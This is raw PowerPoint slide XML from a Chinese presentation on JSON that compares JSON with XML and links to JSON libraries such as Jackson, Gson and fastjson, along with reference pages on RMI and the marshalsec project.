      <a:lvl9pPr marL="0" marR="0" indent="1828800" algn="ctr" defTabSz="821055" rtl="0" latinLnBrk="0">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="0"/>
        </a:spcAft>
        <a:buClrTx/>
        <a:buSzTx/>
        <a:buFontTx/>
        <a:buNone/>
        <a:defRPr sz="4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1pPr>
      <a:lvl2pPr marL="0" marR="0" indent="22860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2pPr>
      <a:lvl3pPr marL="0" marR="0" indent="45720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3pPr>
      <a:lvl4pPr marL="0" marR="0" indent="68580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4pPr>
      <a:lvl5pPr marL="0" marR="0" indent="91440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5pPr>
      <a:lvl6pPr marL="0" marR="0" indent="114300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6pPr>
      <a:lvl7pPr marL="0" marR="0" indent="137160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7pPr>
      <a:lvl8pPr marL="0" marR="0" indent="160020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8pPr>
      <a:lvl9pPr marL="0" marR="0" indent="1828800" algn="ctr" defTabSz="821055" rtl="0" latinLnBrk="0">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="0"/>
        </a:spcAft>
        <a:buClrTx/>
        <a:buSzTx/>
        <a:buFontTx/>
        <a:buNone/>
        <a:defRPr sz="22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json-lib.sourceforge.net/index.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FasterXML/jackso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google/gso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libaba/fastjso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baike.baidu.com/item/RMI"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s://baike.baidu.com/item/%E5%88%86%E5%B8%83%E5%BC%8F%E5%BA%94%E7%94%A8" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://baike.baidu.com/item/%E8%BF%9C%E7%A8%8B"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mbechler/marshalsec"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8789337" y="5038072"/>
            <a:ext cx="8702249" cy="2313373"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="48220" tIns="48220" rIns="48220" bIns="48220" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="1285875">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr sz="7600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei"/>
                <a:ea typeface="Microsoft YaHei"/>
                <a:cs typeface="Microsoft YaHei"/>
                <a:sym typeface="Microsoft YaHei"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="9600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="9600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>知识分享</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14227918" y="7012245"/>
            <a:ext cx="3027696" cy="1759375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="48220" tIns="48220" rIns="48220" bIns="4822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defTabSz="1285875">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei"/>
                <a:ea typeface="Microsoft YaHei"/>
                <a:cs typeface="Microsoft YaHei"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="7200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>王亚强</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:alpha val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2"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48380"/>
            <a:ext cx="6871113" cy="11416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en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1C3267"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1C3267"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1C3267"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1C3267"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的比较</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030682" y="2824599"/>
            <a:ext cx="22360260" cy="4355519"/>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marL="0" marR="0" indent="0" algn="l" defTabSz="821055" rtl="0" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="4600" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="4600" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="4600" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="4600" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>相同之处：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="4600" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uFillTx/>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="Helvetica Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" indent="-914400" algn="l" defTabSz="821055" rtl="0" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>纯文本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" indent="-914400" algn="l" defTabSz="821055" rtl="0" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>具有自我描述性（人类可读）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" indent="-914400" algn="l" defTabSz="821055" rtl="0" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="4600" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>具有层级结构</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="4600" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uFillTx/>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="Helvetica Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" indent="-914400" algn="l" defTabSz="821055" rtl="0" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="4600" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>可通过</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="4600" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="4600" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>解析解析</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="4600" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uFillTx/>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="Helvetica Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" indent="-914400" algn="l" defTabSz="821055" rtl="0" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>数据可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>AJAX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>进行传输</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="4600" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uFillTx/>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="Helvetica Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291827367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48380"/>
            <a:ext cx="6871113" cy="11416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en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1C3267"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1C3267"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1C3267"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1C3267"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的比较</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030682" y="2711946"/>
            <a:ext cx="22507744" cy="5047536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>优势之</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>处：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>看到，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSON </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>简单的语法格式和清晰的层次结构明显要比 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>容易阅读，并且在数据交换方面，由于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSON </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>所使用的字符要比 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>少得多，可以大大得节约传输数据所占用的带宽。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>有效数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>率</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="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作为数据包格式传输的时候具有更高的效率，这是因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">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不像</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
